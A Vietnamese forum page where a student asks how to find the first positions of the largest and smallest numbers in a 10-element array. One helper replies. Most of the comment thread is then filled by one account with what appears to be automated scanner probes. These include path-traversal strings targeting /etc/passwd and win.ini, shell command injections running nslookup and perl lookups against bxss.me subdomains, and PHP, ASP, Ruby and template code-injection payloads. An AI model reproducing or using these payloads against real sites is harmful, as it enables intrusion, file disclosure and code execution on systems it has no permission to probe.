Bài tập 2:Tìm vị trí đầu tiên của số lớn nhất,số nhỏ nhất trong mảng có 10 phần tử? Yêu Cầu: +)Thiết kế giao diện nhập từng phần tử và in ra màn hình. +)Sau khi nhập đủ 10 phần tử thì thực hiện tìm vị trí đầu tiên của số lớn nhất, số nhỏ nhất.

Viết câu trả lời

Drop Images

2 Bình luận

phaptl avatar

Bạn biết làm những phần nào rồi? cần giúp phần nào nói ra để mọi người biết giúp cách tốt nhất nhé

phqghume avatar
phqghume avatar

mgSxwrPk

phqghume avatar
phqghume avatar

response.write(9281381*9978365)

phqghume avatar
phqghume avatar
phqghume avatar

'+response.write(9281381*9978365)+'

phqghume avatar
phqghume avatar
phqghume avatar

"+response.write(9281381*9978365)+"

phqghume avatar

12345'"\'\");|]*{ <>

phqghume avatar

../../../../../../../../../../../../../../etc/passwd

phqghume avatar
phqghume avatar

${9999487+9999780}

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../../proc/version

phqghume avatar
phqghume avatar
phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

phqghume avatar
phqghume avatar

@phaptl :e&n977759=v995072

phqghume avatar
phqghume avatar

../../../../../../../../../../etc/passwd.vn/thanh-vien/phaptl) :e

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.vn/thanh-vien/phaptl) :e

phqghume avatar

echo folacq$()\ xbryxq\nz^xyu||a #' &echo folacq$()\ xbryxq\nz^xyu||a #|" &echo folacq$()\ xbryxq\nz^xyu||a #

phqghume avatar
phqghume avatar

1some_inexistent_file_with_long_name.vn/thanh-vien/phaptl) :e

phqghume avatar

'.gethostbyname(lc('hitxq'.'rbxzfzqm1d69a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(72).chr(116).chr(89).'

phqghume avatar
phqghume avatar

)

phqghume avatar
phqghume avatar

/../..//../..//../..//../..//../..//etc/passwd.vn/thanh-vien/phaptl) :e

phqghume avatar

&echo uctgpc$()\ mxpwkp\nz^xyu||a #' &echo uctgpc$()\ mxpwkp\nz^xyu||a #|" &echo uctgpc$()\ mxpwkp\nz^xyu||a #

phqghume avatar

".gethostbyname(lc("hitfs"."hqsepzbw228b8.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(88).chr(117).chr(80)."

phqghume avatar

!(()&&!|||

phqghume avatar
phqghume avatar
phqghume avatar

|echo bynnxa$()\ riraxg\nz^xyu||a #' |echo bynnxa$()\ riraxg\nz^xyu||a #|" |echo bynnxa$()\ riraxg\nz^xyu||a #

phqghume avatar

.\./.\./.\./.\./.\./.\./etc/passwd

phqghume avatar

^(#$!@#$)(()))**

phqghume avatar
phqghume avatar

(nslookup hitwengxqifusdd283.bxss.me||perl -e "gethostbyname('hitwengxqifusdd283.bxss.me')")

phqghume avatar

/etc/passwd

phqghume avatar

bxss.me

phqghume avatar

$(nslookup hitftcuqslhbo36e53.bxss.me||perl -e "gethostbyname('hitftcuqslhbo36e53.bxss.me')")

phqghume avatar

%2fetc%2fpasswd

phqghume avatar
phqghume avatar

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

phqghume avatar

"+"A".concat(70-3).concat(22*4).concat(103).concat(87).concat(107).concat(81)+(require"socket" Socket.gethostbyname("hitvn"+"kzlbnfhh902f4.bxss.me.")[3].to_s)+"

phqghume avatar

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

phqghume avatar

bxss.me/t/xss.html?%00

phqghume avatar

/.././.././.././.././.././.././.././../etc/./passwd%00

phqghume avatar

&(nslookup hitgzlansngrk6fed1.bxss.me||perl -e "gethostbyname('hitgzlansngrk6fed1.bxss.me')")&'\"0&(nslookup hitgzlansngrk6fed1.bxss.me||perl -e "gethostbyname('hitgzlansngrk6fed1.bxss.me')")&'

phqghume avatar
phqghume avatar

'+'A'.concat(70-3).concat(22*4).concat(99).concat(87).concat(107).concat(69)+(require'socket' Socket.gethostbyname('hitvw'+'mxvziaegdac81.bxss.me.')[3].to_s)+'

phqghume avatar

';print(md5(31337));$a='

phqghume avatar

|(nslookup hitdptwizqvod0063e.bxss.me||perl -e "gethostbyname('hitdptwizqvod0063e.bxss.me')")

phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar
phqghume avatar

";print(md5(31337));$a="

phqghume avatar

(nslookup hitsqgzwfeelg67c6a.bxss.me||perl -e "gethostbyname('hitsqgzwfeelg67c6a.bxss.me')")

phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar
phqghume avatar

${@print(md5(31337))}

phqghume avatar

;(nslookup hitlekswhpibnb8a7d.bxss.me||perl -e "gethostbyname('hitlekswhpibnb8a7d.bxss.me')")|(nslookup hitlekswhpibnb8a7d.bxss.me||perl -e "gethostbyname('hitlekswhpibnb8a7d.bxss.me')")&(nslookup hitlekswhpibnb8a7d.bxss.me||perl -e "gethostbyname('hitlekswhpibnb8a7d.bxss.me')")

phqghume avatar

../././../././../././../././../././../././../././../././../././../././etc/passwd

phqghume avatar
phqghume avatar

tra-loi-comment/.

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

..

phqghume avatar

${@print(md5(31337))}\

phqghume avatar
phqghume avatar

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

'.print(md5(31337)).'

phqghume avatar
phqghume avatar

file:///etc/passwd

phqghume avatar

/xfs.bxss.me

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

'"

phqghume avatar

/../../../../../../../etc/passwd

phqghume avatar

964850

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar